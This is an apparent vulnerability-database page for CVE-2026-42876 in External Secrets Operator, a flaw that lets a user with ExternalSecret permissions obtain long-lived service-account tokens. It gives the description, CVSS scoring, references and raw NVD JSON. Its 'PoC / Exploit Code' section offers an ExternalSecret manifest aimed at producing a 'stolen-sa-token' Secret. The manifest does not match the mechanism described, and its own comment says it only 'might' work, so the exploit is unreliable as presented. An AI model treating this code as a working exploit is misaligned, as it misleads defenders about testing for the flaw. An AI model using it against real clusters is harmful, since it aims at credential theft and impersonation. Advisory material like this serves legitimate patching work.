Security Vulnerability Report
CVE-2026-42876 CVSS 4.9 MEDIUM

Published: 2026-05-11 20:25:44
Last Modified: 2026-05-11 20:25:44

Description

External Secrets Operator reads information from a third-party service and automatically injects the values as Kubernetes Secrets. Prior to 2.4.1, a user who only has permission to create ExternalSecret resources can cause the operator to create a Secret that Kubernetes will automatically populate with a long-lived token for the specified service account. This effectively allows the user to impersonate any service account in the namespace without needing direct create permissions on TokenRequest or Secrets of that type. This vulnerability is fixed in 2.4.1.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record; the affected range stated in the description is:

External Secrets Operator < 2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
  name: exploit-cve-2026-42876
  namespace: default
spec:
  # Reference to the SecretStore configured in the cluster
  secretStoreRef:
    name: example-store
    kind: SecretStore
  # Target Secret name where the token will be injected
  target:
    name: stolen-sa-token
    creationPolicy: Owner
  data:
    - secretKey: token
      remoteRef:
        # In a vulnerable version, this configuration might trigger
        # the operator to generate a token for a specified service account
        key: "target-service-account-token"

References

https://github.com/external-secrets/external-secrets/commit/4ddd240af7fe88725d9857b9a0c198073502e288
https://github.com/external-secrets/external-secrets/releases/tag/v2.4.1
https://github.com/external-secrets/external-secrets/security/advisories/GHSA-fq7h-9x26-6j22

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42876", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:44.307", "lastModified": "2026-05-11T20:25:44.307", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "External Secrets Operator reads information from a third-party service and automatically injects the values as Kubernetes Secrets. Prior to 2.4.1, a user who only has permission to create ExternalSecret resources can cause the operator to create a Secret that Kubernetes will automatically populate with a long-lived token for the specified service account. This effectively allows the user to impersonate any service account in the namespace without needing direct create permissions on TokenRequest or Secrets of that type. This vulnerability is fixed in 2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/external-secrets/external-secrets/commit/4ddd240af7fe88725d9857b9a0c198073502e288", "source": "[email protected]"}, {"url": "https://github.com/external-secrets/external-secrets/releases/tag/v2.4.1", "source": "[email protected]"}, {"url": "https://github.com/external-secrets/external-secrets/security/advisories/GHSA-fq7h-9x26-6j22", "source": "[email protected]"}]}}